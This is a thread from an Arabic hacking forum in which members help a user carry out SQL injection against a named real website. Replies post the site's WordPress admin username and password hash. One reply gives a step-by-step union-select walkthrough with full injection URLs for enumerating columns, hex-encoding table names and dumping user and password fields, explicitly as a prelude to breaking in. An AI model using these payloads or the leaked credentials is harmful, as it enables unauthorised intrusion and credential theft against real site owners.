|
مساعده من محترفى SQL السلام عليكم يا ناس انا جيت لحد الخطوه دى وعطلت كود PHP: كود PHP: :a43::a43::a43: العمود المصاب 4 5.0.67.d7-ourdelta-log :اصدار القاعده version james138 :اسم القاعده database ارجو المساعده |
السلام عليكم أخويا هدا هو الاستغلال الصحيح اسم الجدول wp_users وهده هي البيانات user_login=admin user_pass=$P$BhlMDlSbrPUVKfkJkM3dkEnFPEoALF/ |
|
تقبل مروري ســلامــــــــــات |
الف الف الف الف الف شكر اخى X-Sn4k3 بس معلش توضيح ده الباس $P$BhlMDlSbrPUVKfkJkM3dkEnFPEoALF مشفر md5 وده اليوزر admin |
hatmoot طبعأأ أخويا هدا الباس $P$BhlMDlSbrPUVKfkJkM3dkEnFPEoALF بس مش من نوع Md5 هدا نوع أخر وصعيب جداا واليوزر هو admin موفقــ |
السلام عليكم اخي اولا ./ كود: http://qcsgopc.org/quote.php?ID=13+union+select+1,2,3,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,5+from+information_schema.columns+where+column_name%20+like+char%2837,%20112,%2097,%20115,%20115,%2037%29ثانيــا يا اخي .. كود: http://qcsgopc.org/quote.php?ID=-13+union+select+1,2,3,wp_posts,5+from+james138شوف اخي عندما استخرجت اعمدة الباسورد وهي .. wp_posts:post_password:james138 wp_users:user_pass:james138 طبعـــا انت استخرجتها بالحنقه الاولى وهي هذه . طيب لما ظهرت لك الاعمدة او الجداول هذي . wp_posts:post_password:james138 wp_users:user_pass:james138 اذهــب فــوررأأأ الى هذا المـــوقــع .. وهو موقع التشفير .. http://waraxe.us/sql-char-encoder.html طيب الحين ياغالي تاخذ [ اســم الجدول ] .. وهذا هو wp_posts او wp_users اختر واحد فيهم واذهب الى الى موقع التشفير وضعــه في الموقع حتى يتم تشفيره لكي يستخرج لك عمود اليوزر نيــم .. وهذه صــورة ياغالي .. http://www.up-00.com/Feb10/WLj07507.jpg الان عرفنا كيف نشفر .. ^^ طيب انسخ الكلام الي ماشر عليه بالصوره بعد التشفير وضعه بعد الامر هذا .. where+table_name=# مثال .: +where+table_name=0x77705f706f737473 الان انسخ الامر كامل ..مع الكلام الي شفرناهـ .. واذهب الى الحقنـه هذه .. وامــســح هذا الامر تبع الباسورد where+column_name +like+char(37, 112, 97, 115, 115, 37) وضــع هذا الامر .. +where+table_name=0x77705f706f737473 ولا تنسى ان تضع هذا [ -- ] او iهذا [ /* ] اذا كان الموقع لايقبل .. وبعد ماتفعل سوف يظهر لك اسم اليوزر .. وهو post_name لما يظهر اذهب وضع اسم اليوز في العمود المصاب وسوف يظهر لك اسم صاحب الموقع او اذا اردت ان يظهر لك الباسورد واليوز مع بعض اكتب هذا الامر في العمود المصاب .. Concat(user,0x3a,pass) ضـع مكان user اسسم اليوزر نيم تبع االموقع الي انت طلعتــه وضع مكان pass اسم عمود الباسورد الي انت طلعتــه وهو post_password او user_pass وفي نهايت الرابط ضــع هذا الاسسم james138 وهو ياتي دايمــا اخر كلمــه wp_posts:post_password:james138 ثم اضغط انتر وسوف يظهر لك اليوز والباسورد .. ومن ثم الاختراق .. أرجــو إنــك فـهــمت شرحــي وانا انصــحك تتابع هذا الفهرس تبع الاخ [ فلكانو جزاه الله خيرأأ ] وهو فهرس لإختراق المواقع بثغرات SQL وبإذن الله سوف تصبح محترف ياغالي وهذا رابط الفهرس هنا بالمنتدى .. http://www.vbspiders.com/vb/t22432.html تحياتي لك اخــي الغالي :00001793[1]:وأختراقات موفقــه بإذن الله .. :) :00001793[1]: |
اسف ياغالي على التاخير بالرد بس كنت اسويلك شرح هههههههههههههههههههههه بالتوفيق |
والله مش عارف اشكركم ازاى ربنااااااااااااااااااااااااااااااااا يصلح حالكم شكررررررا اوى اخواتى X-Sn4k3وDr.NaNo |
| الساعة الآن 07:10 AM |
[ vBspiders.Com Network ]